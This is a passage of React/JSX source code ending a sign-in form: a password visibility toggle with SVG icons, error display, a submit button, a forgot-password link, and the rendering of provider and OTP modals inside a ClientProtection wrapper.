                    {showPassword ? (
                      <svg
                        className="w-5 h-5"
                        fill="none"
                        stroke="currentColor"
                        viewBox="0 0 24 24"
                      >
                        <path
                          strokeLinecap="round"
                          strokeLinejoin="round"
                          strokeWidth={2}
                          d="M13.875 18.825A10.05 10.05 0 0112 19c-4.478 0-8.268-2.943-9.543-7a9.97 9.97 0 011.563-3.029m5.858.908a3 3 0 114.243 4.243M9.878 9.878l4.242 4.242M9.878 9.878L3 3m6.878 6.878L21 21"
                        />
                      </svg>
                    ) : (
                      <svg
                        className="w-5 h-5"
                        fill="none"
                        stroke="currentColor"
                        viewBox="0 0 24 24"
                      >
                        <path
                          strokeLinecap="round"
                          strokeLinejoin="round"
                          strokeWidth={2}
                          d="M15 12a3 3 0 11-6 0 3 3 0 016 0z"
                        />
                        <path
                          strokeLinecap="round"
                          strokeLinejoin="round"
                          strokeWidth={2}
                          d="M2.458 12C3.732 7.943 7.523 5 12 5c4.478 0 8.268 2.943 9.542 7-1.274 4.057-5.064 7-9.542 7-4.477 0-8.268-2.943-9.542-7z"
                        />
                      </svg>
                    )}
                  </button>
                </div>
                {error && !showProviderModal && !showOtpModal && (
                  <p className="text-red-600 text-sm mt-2">{error}</p>
                )}
              </div>

              <button
                type="submit"
                disabled={isLoading || !password}
                className="w-full bg-gray-800 text-white py-3 rounded font-medium hover:bg-gray-900 disabled:opacity-50 disabled:cursor-not-allowed"
              >
                {isLoading ? "Signing in..." : "Sign in"}
              </button>

              <div className="text-center mt-4">
                <a href="#" className="text-gray-600 text-sm hover:underline">
                  Forgot password?
                </a>
              </div>
            </form>
          </div>
        </div>

        {/* Modals */}
        {showProviderModal && providerModal}
        {showOtpModal && otpModal}
      </div>
    </ClientProtection>
  );
}
